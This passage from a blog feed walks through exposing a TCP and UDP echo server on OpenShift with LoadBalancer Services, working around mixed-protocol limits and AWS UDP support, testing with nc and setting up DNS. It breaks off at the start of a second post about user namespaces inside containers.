<span id="cb1-13"><a href="#cb1-13" aria-hidden="true" tabindex="-1"></a>    <span class="cf">with</span> socketserver.TCPServer((<span class="st">&#39;&#39;</span>, <span class="dv">12345</span>), Handler) <span class="im">as</span> server:</span>
<span id="cb1-14"><a href="#cb1-14" aria-hidden="true" tabindex="-1"></a>        server.serve_forever()</span>
<span id="cb1-15"><a href="#cb1-15" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb1-16"><a href="#cb1-16" aria-hidden="true" tabindex="-1"></a><span class="kw">def</span> serve_udp():</span>
<span id="cb1-17"><a href="#cb1-17" aria-hidden="true" tabindex="-1"></a>    <span class="kw">class</span> Handler(socketserver.DatagramRequestHandler):</span>
<span id="cb1-18"><a href="#cb1-18" aria-hidden="true" tabindex="-1"></a>        <span class="kw">def</span> handle(<span class="va">self</span>):</span>
<span id="cb1-19"><a href="#cb1-19" aria-hidden="true" tabindex="-1"></a>            <span class="va">self</span>.wfile.write(<span class="va">self</span>.rfile.read().upper())</span>
<span id="cb1-20"><a href="#cb1-20" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb1-21"><a href="#cb1-21" aria-hidden="true" tabindex="-1"></a>    <span class="cf">with</span> socketserver.UDPServer((<span class="st">&#39;&#39;</span>, <span class="dv">12345</span>), Handler) <span class="im">as</span> server:</span>
<span id="cb1-22"><a href="#cb1-22" aria-hidden="true" tabindex="-1"></a>        server.serve_forever()</span>
<span id="cb1-23"><a href="#cb1-23" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb1-24"><a href="#cb1-24" aria-hidden="true" tabindex="-1"></a><span class="cf">if</span> <span class="va">__name__</span> <span class="op">==</span> <span class="st">&quot;__main__&quot;</span>:</span>
<span id="cb1-25"><a href="#cb1-25" aria-hidden="true" tabindex="-1"></a>    threading.Thread(target<span class="op">=</span>serve_tcp).start()</span>
<span id="cb1-26"><a href="#cb1-26" aria-hidden="true" tabindex="-1"></a>    threading.Thread(target<span class="op">=</span>serve_udp).start()</span></code></pre></div>
<p>The <code>Containerfile</code> adds this program to the official Fedora 35
container and declares the entry point:</p>
<div class="sourceCode" id="cb2"><pre class="sourceCode dockerfile"><code class="sourceCode dockerfile"><span id="cb2-1"><a href="#cb2-1" aria-hidden="true" tabindex="-1"></a><span class="kw">FROM</span> fedora:35-x86_64</span>
<span id="cb2-2"><a href="#cb2-2" aria-hidden="true" tabindex="-1"></a><span class="kw">COPY</span> echo.py .</span>
<span id="cb2-3"><a href="#cb2-3" aria-hidden="true" tabindex="-1"></a><span class="kw">CMD</span> [ <span class="st">&quot;python3&quot;</span>, <span class="st">&quot;echo.py&quot;</span> ]</span></code></pre></div>
<p>I published the container <a href="https://quay.io/repository/ftweedal/udpecho">image on Quay.io</a>. The Pod spec
references it:</p>
<div class="sourceCode" id="cb3"><pre class="sourceCode yaml"><code class="sourceCode yaml"><span id="cb3-1"><a href="#cb3-1" aria-hidden="true" tabindex="-1"></a><span class="fu">apiVersion</span><span class="kw">:</span><span class="at"> v1</span></span>
<span id="cb3-2"><a href="#cb3-2" aria-hidden="true" tabindex="-1"></a><span class="fu">kind</span><span class="kw">:</span><span class="at"> Pod</span></span>
<span id="cb3-3"><a href="#cb3-3" aria-hidden="true" tabindex="-1"></a><span class="fu">metadata</span><span class="kw">:</span></span>
<span id="cb3-4"><a href="#cb3-4" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">name</span><span class="kw">:</span><span class="at"> echo</span></span>
<span id="cb3-5"><a href="#cb3-5" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">labels</span><span class="kw">:</span></span>
<span id="cb3-6"><a href="#cb3-6" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">app</span><span class="kw">:</span><span class="at"> echo</span></span>
<span id="cb3-7"><a href="#cb3-7" aria-hidden="true" tabindex="-1"></a><span class="fu">spec</span><span class="kw">:</span></span>
<span id="cb3-8"><a href="#cb3-8" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">containers</span><span class="kw">:</span></span>
<span id="cb3-9"><a href="#cb3-9" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="kw">-</span><span class="at"> </span><span class="fu">name</span><span class="kw">:</span><span class="at"> server</span></span>
<span id="cb3-10"><a href="#cb3-10" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">image</span><span class="kw">:</span><span class="at"> quay.io/ftweedal/udpecho:latest</span></span></code></pre></div>
<p>I defined a new project namespace <code>echo</code> and created the Pod:</p>
<pre class="shell"><code>% oc new-project echo
Now using project &quot;echo&quot; on server
  &quot;https://api.ci-ln-4ixdypb-72292.origin-ci-int-gce.dev.rhcloud.com:6443&quot;.

…

% oc create -f pod-echo.yaml
pod/echo created</code></pre>
<h2 id="create-service-object">Create Service object <a href="#create-service-object" class="section">§</a></h2>
<p>My application is not talking HTTP, so I can’t use the normal
Ingress or Route facilities to get traffic to my app.</p>
<div class="note">
<p>HTTP and HTTPS traffic includes the <strong><code>Host</code></strong> header, which the
ingress system can inspect to route requests to a particular Pod.
Similarly, TLS with the <strong><em>Server Name (SNI)</em></strong> extension allows TLS
traffic to be routed to a particular Pod (the Pod will perform the
handshake). Neither approach works for UDP packets or “bare” TCP
connections.</p>
</div>
<p>Therefore, I define a <code>LoadBalancer</code> Service. The service
controller will ask the cloud provider to create a load balancer
that routes external traffic into the cluster. For example, on AWS
it will (by default) create an ELB (<em>Elastic Load Balancer</em>)
instance.</p>
<div class="sourceCode" id="cb5"><pre class="sourceCode yaml"><code class="sourceCode yaml"><span id="cb5-1"><a href="#cb5-1" aria-hidden="true" tabindex="-1"></a><span class="fu">apiVersion</span><span class="kw">:</span><span class="at"> v1</span></span>
<span id="cb5-2"><a href="#cb5-2" aria-hidden="true" tabindex="-1"></a><span class="fu">kind</span><span class="kw">:</span><span class="at"> Service</span></span>
<span id="cb5-3"><a href="#cb5-3" aria-hidden="true" tabindex="-1"></a><span class="fu">metadata</span><span class="kw">:</span></span>
<span id="cb5-4"><a href="#cb5-4" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">name</span><span class="kw">:</span><span class="at"> echo</span></span>
<span id="cb5-5"><a href="#cb5-5" aria-hidden="true" tabindex="-1"></a><span class="fu">spec</span><span class="kw">:</span></span>
<span id="cb5-6"><a href="#cb5-6" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">type</span><span class="kw">:</span><span class="at"> LoadBalancer</span></span>
<span id="cb5-7"><a href="#cb5-7" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">selector</span><span class="kw">:</span></span>
<span id="cb5-8"><a href="#cb5-8" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">app</span><span class="kw">:</span><span class="at"> echo</span></span>
<span id="cb5-9"><a href="#cb5-9" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">ports</span><span class="kw">:</span></span>
<span id="cb5-10"><a href="#cb5-10" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="kw">-</span><span class="at"> </span><span class="fu">name</span><span class="kw">:</span><span class="at"> tcpecho</span></span>
<span id="cb5-11"><a href="#cb5-11" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">protocol</span><span class="kw">:</span><span class="at"> TCP</span></span>
<span id="cb5-12"><a href="#cb5-12" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">port</span><span class="kw">:</span><span class="at"> </span><span class="dv">12345</span></span>
<span id="cb5-13"><a href="#cb5-13" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="kw">-</span><span class="at"> </span><span class="fu">name</span><span class="kw">:</span><span class="at"> udpecho</span></span>
<span id="cb5-14"><a href="#cb5-14" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">protocol</span><span class="kw">:</span><span class="at"> UDP</span></span>
<span id="cb5-15"><a href="#cb5-15" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">port</span><span class="kw">:</span><span class="at"> </span><span class="dv">12345</span></span></code></pre></div>
<p>OK, let’s create the Service:</p>
<pre class="shell"><code>% oc create -f service-echo.yaml 
The Service &quot;echo&quot; is invalid: spec.ports: Invalid value:
[]core.ServicePort{core.ServicePort{Name:&quot;tcpecho&quot;, Protocol:&quot;TCP&quot;,
AppProtocol:(*string)(nil), Port:12345,
TargetPort:intstr.IntOrString{Type:0, IntVal:12345, StrVal:&quot;&quot;},
NodePort:0}, core.ServicePort{Name:&quot;udpecho&quot;, Protocol:&quot;UDP&quot;,
AppProtocol:(*string)(nil), Port:12345,
TargetPort:intstr.IntOrString{Type:0, IntVal:12345, StrVal:&quot;&quot;},
NodePort:0}}: may not contain more than 1 protocol when type is
&#39;LoadBalancer&#39;</code></pre>
<p>Well, that’s unfortunate. Kubernetes does not support
<code>LoadBalancer</code> services with mixed <code>protocol</code>. <a href="https://github.com/kubernetes/enhancements/issues/1435">KEP 1435</a> is in
progress to address this. It is a gated “alpha” feature <a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.20.md">since
Kubernetes 1.20</a>. Cloud provider support is
currently <a href="https://github.com/kubernetes/enhancements/issues/1435#issuecomment-969523031">mixed</a> but work is ongoing.</p>
<p>So for now, I have to create separate Service objects for UDP and
TCP ingress. As a consequence, there will be <strong>different public IP
addresses for TCP and UDP</strong>. Whether this is a problem depends on
the application. Applications that use <code>SRV</code> records to locate
servers can handle this scenario. Kerberos is such an application
(modern implementations, at least). Applications that use <code>A</code> or
<code>AAAA</code> records directly might have problems.</p>
<p>The other downside is cost. Cloud providers charge money for load
balancer instances. The more you use, the more you pay.</p>
<p>Below is the definition of my decomposed Service objects:</p>
<div class="sourceCode" id="cb7"><pre class="sourceCode yaml"><code class="sourceCode yaml"><span id="cb7-1"><a href="#cb7-1" aria-hidden="true" tabindex="-1"></a><span class="fu">apiVersion</span><span class="kw">:</span><span class="at"> v1</span></span>
<span id="cb7-2"><a href="#cb7-2" aria-hidden="true" tabindex="-1"></a><span class="fu">kind</span><span class="kw">:</span><span class="at"> Service</span></span>
<span id="cb7-3"><a href="#cb7-3" aria-hidden="true" tabindex="-1"></a><span class="fu">metadata</span><span class="kw">:</span></span>
<span id="cb7-4"><a href="#cb7-4" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">name</span><span class="kw">:</span><span class="at"> echo-udp</span></span>
<span id="cb7-5"><a href="#cb7-5" aria-hidden="true" tabindex="-1"></a><span class="fu">spec</span><span class="kw">:</span></span>
<span id="cb7-6"><a href="#cb7-6" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">type</span><span class="kw">:</span><span class="at"> LoadBalancer</span></span>
<span id="cb7-7"><a href="#cb7-7" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">selector</span><span class="kw">:</span></span>
<span id="cb7-8"><a href="#cb7-8" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">app</span><span class="kw">:</span><span class="at"> echo</span></span>
<span id="cb7-9"><a href="#cb7-9" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">ports</span><span class="kw">:</span></span>
<span id="cb7-10"><a href="#cb7-10" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="kw">-</span><span class="at"> </span><span class="fu">name</span><span class="kw">:</span><span class="at"> udpecho</span></span>
<span id="cb7-11"><a href="#cb7-11" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">protocol</span><span class="kw">:</span><span class="at"> UDP</span></span>
<span id="cb7-12"><a href="#cb7-12" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">port</span><span class="kw">:</span><span class="at"> </span><span class="dv">12345</span></span>
<span id="cb7-13"><a href="#cb7-13" aria-hidden="true" tabindex="-1"></a><span class="pp">---</span></span>
<span id="cb7-14"><a href="#cb7-14" aria-hidden="true" tabindex="-1"></a><span class="fu">apiVersion</span><span class="kw">:</span><span class="at"> v1</span></span>
<span id="cb7-15"><a href="#cb7-15" aria-hidden="true" tabindex="-1"></a><span class="fu">kind</span><span class="kw">:</span><span class="at"> Service</span></span>
<span id="cb7-16"><a href="#cb7-16" aria-hidden="true" tabindex="-1"></a><span class="fu">metadata</span><span class="kw">:</span></span>
<span id="cb7-17"><a href="#cb7-17" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">name</span><span class="kw">:</span><span class="at"> echo-tcp</span></span>
<span id="cb7-18"><a href="#cb7-18" aria-hidden="true" tabindex="-1"></a><span class="fu">spec</span><span class="kw">:</span></span>
<span id="cb7-19"><a href="#cb7-19" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">type</span><span class="kw">:</span><span class="at"> LoadBalancer</span></span>
<span id="cb7-20"><a href="#cb7-20" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">selector</span><span class="kw">:</span></span>
<span id="cb7-21"><a href="#cb7-21" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">app</span><span class="kw">:</span><span class="at"> echo</span></span>
<span id="cb7-22"><a href="#cb7-22" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">ports</span><span class="kw">:</span></span>
<span id="cb7-23"><a href="#cb7-23" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="kw">-</span><span class="at"> </span><span class="fu">name</span><span class="kw">:</span><span class="at"> tcpecho</span></span>
<span id="cb7-24"><a href="#cb7-24" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">protocol</span><span class="kw">:</span><span class="at"> TCP</span></span>
<span id="cb7-25"><a href="#cb7-25" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">port</span><span class="kw">:</span><span class="at"> </span><span class="dv">12345</span></span></code></pre></div>
<p>Creating the objects now succeeds:</p>
<pre class="shell"><code>% oc create -f service-echo.yaml 
service/echo-udp created
service/echo-tcp created</code></pre>
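<p>The decomposition I did by hand can also be expressed programmatically.
The following Python is a minimal sketch, not part of my actual setup: the
function name <code>split_by_protocol</code> and the naming scheme (appending
the lowercase protocol to the Service name) are my own assumptions for
illustration. It takes a Service definition as a plain dict and returns one
Service per protocol.</p>

```python
import copy


def split_by_protocol(service):
    """Return one Service dict per protocol found in spec.ports.

    Hypothetical helper: each result is a deep copy of the input that keeps
    only the ports for one protocol, with the lowercase protocol appended
    to metadata.name (for example "echo" becomes "echo-tcp").
    """
    by_protocol = {}
    for port in service["spec"]["ports"]:
        # Kubernetes treats a missing protocol field as TCP.
        protocol = port.get("protocol", "TCP")
        by_protocol.setdefault(protocol, []).append(port)

    result = []
    for protocol in sorted(by_protocol):
        part = copy.deepcopy(service)
        part["metadata"]["name"] = (
            service["metadata"]["name"] + "-" + protocol.lower()
        )
        part["spec"]["ports"] = copy.deepcopy(by_protocol[protocol])
        result.append(part)
    return result


# The mixed-protocol Service that the API server rejected.
mixed = {
    "apiVersion": "v1",
    "kind": "Service",
    "metadata": {"name": "echo"},
    "spec": {
        "type": "LoadBalancer",
        "selector": {"app": "echo"},
        "ports": [
            {"name": "tcpecho", "protocol": "TCP", "port": 12345},
            {"name": "udpecho", "protocol": "UDP", "port": 12345},
        ],
    },
}

for svc in split_by_protocol(mixed):
    print(svc["metadata"]["name"], [p["protocol"] for p in svc["spec"]["ports"]])
```

<p>Each resulting Service keeps the same <code>selector</code>, so both load
balancers route to the same Pod. The input dict is left unmodified.</p>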
<p>To find out the hostname or IP address of the load balancer ingress
endpoint, inspect the <code>status</code> field of the Service object:</p>
<pre class="shell"><code>% oc get -o json service \
    | jq -c &#39;.items[] | (.metadata.name, .status)&#39;
&quot;echo-tcp&quot;
{&quot;loadBalancer&quot;:{&quot;ingress&quot;:[{&quot;ip&quot;:&quot;34.136.55.93&quot;}]}}
&quot;echo-udp&quot;
{&quot;loadBalancer&quot;:{&quot;ingress&quot;:[{&quot;ip&quot;:&quot;34.71.82.205&quot;}]}}</code></pre>
<p>Most cloud providers report an IP address. That includes Google
Cloud (GCP) where this cluster was deployed. On the other hand, AWS
reports a DNS name. Below is the result of creating my service
objects on a cluster hosted on AWS:</p>
<pre class="shell"><code>% oc get -o json service \
    | jq -c &#39;.items[] | (.metadata.name, .status)&#39;
&quot;echo-tcp&quot;
{&quot;loadBalancer&quot;:{&quot;ingress&quot;:[{&quot;hostname&quot;:&quot;a095e8e1ebb9e4c64ae71e0f3c688ad4-608097611.us-east-2.elb.amazonaws.com&quot;}]}}
&quot;echo-udp&quot;
{&quot;loadBalancer&quot;:{}}</code></pre>
<p>ELB successfully created a load balancer for the TCP port. But
something is wrong with the UDP service. The events give more
information:</p>
<pre class="shell"><code>% oc get event --field-selector involvedObject.name=echo-udp
LAST SEEN   TYPE      REASON                   OBJECT             MESSAGE
94s         Normal    EnsuringLoadBalancer     service/echo-udp   Ensuring load balancer
94s         Warning   SyncLoadBalancerFailed   service/echo-udp   Error syncing load balancer: failed to ensure load balancer: Protocol UDP not supported by LoadBalancer</code></pre>
<p>Load balancer creation failed with the error:</p>
<blockquote>
<p>Error syncing load balancer: failed to ensure load balancer:
Protocol UDP not supported by LoadBalancer</p>
</blockquote>
<p>The workaround is to add an annotation to request a <em>Network Load
Balancer (NLB)</em> instance instead of ELB (the default):</p>
<div class="sourceCode" id="cb12"><pre class="sourceCode yaml"><code class="sourceCode yaml"><span id="cb12-1"><a href="#cb12-1" aria-hidden="true" tabindex="-1"></a><span class="fu">apiVersion</span><span class="kw">:</span><span class="at"> v1</span></span>
<span id="cb12-2"><a href="#cb12-2" aria-hidden="true" tabindex="-1"></a><span class="fu">kind</span><span class="kw">:</span><span class="at"> Service</span></span>
<span id="cb12-3"><a href="#cb12-3" aria-hidden="true" tabindex="-1"></a><span class="fu">metadata</span><span class="kw">:</span></span>
<span id="cb12-4"><a href="#cb12-4" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">name</span><span class="kw">:</span><span class="at"> echo-udp</span></span>
<span id="cb12-5"><a href="#cb12-5" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">annotations</span><span class="kw">:</span></span>
<span id="cb12-6"><a href="#cb12-6" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">service.beta.kubernetes.io/aws-load-balancer-type</span><span class="kw">:</span><span class="at"> </span><span class="st">&quot;nlb&quot;</span></span>
<span id="cb12-7"><a href="#cb12-7" aria-hidden="true" tabindex="-1"></a><span class="fu">spec</span><span class="kw">:</span></span>
<span id="cb12-8"><a href="#cb12-8" aria-hidden="true" tabindex="-1"></a><span class="at">  …</span></span></code></pre></div>
<p>After adding the annotation, both load balancers are configured:</p>
<pre class="shell"><code>% oc get -o json service \
    | jq -c &#39;.items[] | (.metadata.name, .status)&#39;
&quot;echo-tcp&quot;
{&quot;loadBalancer&quot;:{&quot;ingress&quot;:[{&quot;hostname&quot;:&quot;a473cf621de6b49dfabb6e933d0fab55-2099420434.us-east-2.elb.amazonaws.com&quot;}]}}
&quot;echo-udp&quot;
{&quot;loadBalancer&quot;:{&quot;ingress&quot;:[{&quot;hostname&quot;:&quot;af7f7ed0f44c9461dbb54a9a4aedca2c-0c5861432365c726.elb.us-east-2.amazonaws.com&quot;}]}}</code></pre>
<div class="note">
<p><code>aws-load-balancer-type</code> is one of several annotations for modifying
AWS load balancer configuration. See the <a href="https://cloud-provider-aws.sigs.k8s.io/service_controller/">AWS Cloud Provider
documentation</a> for the full list.</p>
</div>
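<p>The <code>status</code> inspection I did with <code>jq</code> throughout
this section could also be done in a program, for example in a controller.
Here is a rough Python sketch under some assumptions: the function name
<code>ingress_endpoints</code> is made up, and the input is assumed to be the
parsed JSON list that <code>oc get -o json service</code> prints. It handles
the three cases seen above: an <code>ip</code>, a <code>hostname</code>, or no
ingress at all.</p>

```python
import json


def ingress_endpoints(service_list):
    """Map each Service name to a list of its reported ingress endpoints.

    Hypothetical helper.  Each endpoint is the "hostname" if present,
    otherwise the "ip".  A Service whose load balancer has not been
    provisioned (or failed to provision) maps to an empty list.
    """
    endpoints = {}
    for item in service_list.get("items", []):
        load_balancer = item.get("status", {}).get("loadBalancer", {})
        found = []
        for ingress in load_balancer.get("ingress", []):
            endpoint = ingress.get("hostname") or ingress.get("ip")
            if endpoint:
                found.append(endpoint)
        endpoints[item["metadata"]["name"]] = found
    return endpoints


# Abbreviated sample shaped like the output of: oc get -o json service
sample = json.loads("""
{"items": [
  {"metadata": {"name": "echo-tcp"},
   "status": {"loadBalancer": {"ingress": [{"ip": "34.136.55.93"}]}}},
  {"metadata": {"name": "echo-udp"},
   "status": {"loadBalancer": {}}}
]}
""")

for name, found in ingress_endpoints(sample).items():
    print(name, found or "no ingress endpoint reported")
```

<p>An empty list is a hint to go and look at the events for that Service, as
I did for <code>echo-udp</code> on AWS.</p>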
<h2 id="testing-the-ingress">Testing the ingress <a href="#testing-the-ingress" class="section">§</a></h2>
<p>Using the IP address or DNS name from the <code>status</code> field, you can
use <code>nc(1)</code> to verify that the server is contactable.</p>
<pre class="shell"><code>% echo hello | nc 34.136.55.93 12345
HELLO

% nc --udp 34.71.82.205 12345
hello                             -- input
HELLO                             -- response
^D</code></pre>
<p>I was able to talk to my echo server via both TCP and UDP.</p>
<div class="note">
<p>If using TLS or DTLS, you could instead use OpenSSL’s <code>s_client(1)</code>
to test connectivity.</p>
</div>
<p>Use the hostname instead of the IP address if that is how the cloud
provider reports the ingress endpoint.</p>
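<p>If you want to script the connectivity check rather than type into
<code>nc</code>, the same round trips can be sketched with Python's standard
<code>socket</code> module. The function names and the 5 second timeout below
are my own choices for illustration. The sketch assumes the server replies
with a single small message, as my echo server does.</p>

```python
import socket


def tcp_roundtrip(host, port, payload, timeout=5.0):
    """Send payload over TCP and return the first chunk the server sends back."""
    with socket.create_connection((host, port), timeout=timeout) as conn:
        conn.sendall(payload)
        return conn.recv(4096)


def udp_roundtrip(host, port, payload, timeout=5.0):
    """Send one UDP datagram and return the first datagram received in reply.

    Raises socket.timeout (an OSError) if nothing comes back in time; UDP
    gives no other indication that the endpoint is unreachable.
    """
    # Resolve first so that hostnames, IPv4 and IPv6 endpoints all work.
    family, kind, proto, _, address = socket.getaddrinfo(
        host, port, type=socket.SOCK_DGRAM)[0]
    with socket.socket(family, kind, proto) as sock:
        sock.settimeout(timeout)
        sock.sendto(payload, address)
        data, _ = sock.recvfrom(4096)
        return data
```

<p>For example, <code>udp_roundtrip("34.71.82.205", 12345, b"hello")</code>
would perform the same exchange as the <code>nc --udp</code> session above,
for as long as that load balancer exists.</p>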
<h2 id="reaching-the-service-via-dns">Reaching the service via DNS <a href="#reaching-the-service-via-dns" class="section">§</a></h2>
<p>The cloud provider has set up the load balancer and the ingress IP
addresses or hostnames are reported in the <code>status</code> field of the
Service object(s). Now you probably wish to set up DNS records so
that clients can use an established domain name to find the server.</p>
<p>I can’t go deep into this topic in this post, because I am still
exploring this problem space myself. But I can describe some
possible solutions at a high level.</p>
<p>One possibility is to teach your application controller to manage
the required DNS records. It would monitor the Service objects and
reconcile the external DNS configuration with what it sees. The
number and kind of records to be created will vary depending on
whether the cloud provider reports the ingress points as hostnames
or IP addresses:</p>
<table>
<thead>
<tr class="header">
<th>Ingress endpoint</th>
<th>Resolution method</th>
<th>Records needed</th>
</tr>
</thead>
<tbody>
<tr class="odd">
<td><code>hostname</code></td>
<td>direct</td>
<td><code>CNAME</code></td>
</tr>
<tr class="even">
<td><code>hostname</code></td>
<td>SRV</td>
<td><code>SRV</code></td>
</tr>
<tr class="odd">
<td><code>ip</code></td>
<td>direct</td>
<td><code>A</code>/<code>AAAA</code></td>
</tr>
<tr class="even">
<td><code>ip</code></td>
<td>SRV</td>
<td><code>A</code>/<code>AAAA</code> and <code>SRV</code></td>
</tr>
</tbody>
</table>
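<p>A controller would need to encode the table above somehow. The following
Python is only a sketch of that decision logic; the names
<code>records_needed</code> and <code>endpoint_kind</code> are hypothetical.
Note the last row: an <code>SRV</code> record's target is a domain name, not
an address, so an IP endpoint needs an address record for the
<code>SRV</code> record to point at.</p>

```python
def endpoint_kind(ingress):
    """Classify one entry of status.loadBalancer.ingress as "hostname" or "ip"."""
    return "hostname" if ingress.get("hostname") else "ip"


def records_needed(kind, resolution):
    """Return the DNS record types needed, following the table above.

    kind: "hostname" or "ip", as reported in the Service status.
    resolution: "direct" if clients look up the service name itself, or
    "srv" if clients locate the server through SRV records.
    """
    table = {
        ("hostname", "direct"): ["CNAME"],
        ("hostname", "srv"): ["SRV"],
        ("ip", "direct"): ["A/AAAA"],
        ("ip", "srv"): ["A/AAAA", "SRV"],
    }
    try:
        return table[(kind, resolution)]
    except KeyError:
        raise ValueError(
            "unsupported combination: %r, %r" % (kind, resolution)
        ) from None


# The UDP endpoint reported on GCP, for an application that uses SRV lookups.
print(records_needed(endpoint_kind({"ip": "34.71.82.205"}), "srv"))
```

<p>A real controller would also have to choose record names and TTLs, and
talk to the DNS provider. None of that is shown here.</p>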
<p>Most applications have similar needs, so it would make sense to
encapsulate this behaviour in a controller that configures arbitrary
external DNS providers. That’s what the Kubernetes <a href="https://github.com/kubernetes-sigs/external-dns">ExternalDNS</a>
project is all about. <a href="https://github.com/kubernetes-sigs/external-dns#status-of-providers">Provider stability varies</a>; at
time of writing the only <em>stable</em> providers are Google Cloud DNS and
AWS Route 53.</p>
<p>Integration with OpenShift is via the <a href="https://github.com/openshift/external-dns-operator">ExternalDNS Operator</a>.
This is an active area of work and ExternalDNS will hopefully be an
officially supported part of OpenShift in a future release.</p>
<p>I haven’t actually played with ExternalDNS yet so can’t say much
more about it at this time. Only that it looks like a very useful
solution!</p>
<p>Finally, recall the caveats I mentioned earlier about applications
that require ingress of <strong>both TCP and UDP</strong> traffic. <a href="https://github.com/kubernetes/enhancements/issues/1435">KEP 1435</a>,
along with cloud provider support, should resolve this issue
eventually.</p>]]></summary>
</entry>
<entry>
    <title>Creating user namespaces inside containers</title>
    <link href="https://frasertweedale.github.io/blog-redhat/posts/2021-10-15-openshift-userns-in-container.html" />
    <id>https://frasertweedale.github.io/blog-redhat/posts/2021-10-15-openshift-userns-in-container.html</id>
    <published>2021-10-15T00:00:00Z</published>
    <updated>2021-10-15T00:00:00Z</updated>
    <summary type="html"><![CDATA[<h1 id="creating-user-namespaces-inside-containers">Creating user namespaces inside containers</h1>
<p>Over the last year I have experimented with user namespace support in
OpenShift. That is, making OpenShift run workloads inside a
separate user namespace. We’re trying to drive this feature
forward, but some people have reservations. Does having processes
running as <code>root</code> inside a user namespace present an increased
security risk? What if there are kernel bugs…</p>
<p>If you’re worried about the security of user namespaces, OpenShift
or Kubernetes user namespace support doesn’t change the game at all.
As I demonstrate in this post, you can create and use user
namespaces <em>inside</em> your workloads right now.</p>
<h2 id="demo">Demo <a href="#demo" class="section">§</a></h2>
<p>I tested on OpenShift 4.9.0 in the default configuration. So, no
explicit user namespace support. I used a stock Fedora container
image with the following Pod spec:</p>
<div class="sourceCode" id="cb1"><pre class="sourceCode yaml"><code class="sourceCode yaml"><span id="cb1-1"><a href="#cb1-1" aria-hidden="true" tabindex="-1"></a><span class="fu">apiVersion</span><span class="kw">:</span><span class="at"> v1</span></span>
<span id="cb1-2"><a href="#cb1-2" aria-hidden="true" tabindex="-1"></a><span class="fu">kind</span><span class="kw">:</span><span class="at"> Pod</span></span>
<span id="cb1-3"><a href="#cb1-3" aria-hidden="true" tabindex="-1"></a><span class="fu">metadata</span><span class="kw">:</span></span>
<span id="cb1-4"><a href="#cb1-4" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">name</span><span class="kw">:</span><span class="at"> fedora</span></span>
<span id="cb1-5"><a href="#cb1-5" aria-hidden="true" tabindex="-1"></a><span class="fu">spec</span><span class="kw">:</span></span>
<span id="cb1-6"><a href="#cb1-6" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">containers</span><span class="kw">:</span></span>
<span id="cb1-7"><a href="#cb1-7" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="kw">-</span><span class="at"> </span><span class="fu">name</span><span class="kw">:</span><span class="at"> fedora</span></span>
<span id="cb1-8"><a href="#cb1-8" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">image</span><span class="kw">:</span><span class="at"> registry.fedoraproject.org/fedora:34-x86_64</span></span>
<span id="cb1-9"><a href="#cb1-9" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">command</span><span class="kw">:</span><span class="at"> </span><span class="kw">[</span><span class="st">&quot;sleep&quot;</span><span class="kw">,</span><span class="at"> </span><span class="st">&quot;3600&quot;</span><span class="kw">]</span></span>
<span id="cb1-10"><a href="#cb1-10" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">securityContext</span><span class="kw">:</span></span>
<span id="cb1-11"><a href="#cb1-11" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="fu">capabilities</span><span class="kw">:</span></span>
<span id="cb1-12"><a href="#cb1-12" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="fu">drop</span><span class="kw">:</span></span>
<span id="cb1-13"><a href="#cb1-13" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="kw">-</span><span class="at"> CHOWN</span></span>
<span id="cb1-14"><a href="#cb1-14" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="kw">-</span><span class="at"> DAC_OVERRIDE</span></span>
<span id="cb1-15"><a href="#cb1-15" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="kw">-</span><span class="at"> FOWNER</span></span>
<span id="cb1-16"><a href="#cb1-16" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="kw">-</span><span class="at"> FSETID</span></span>
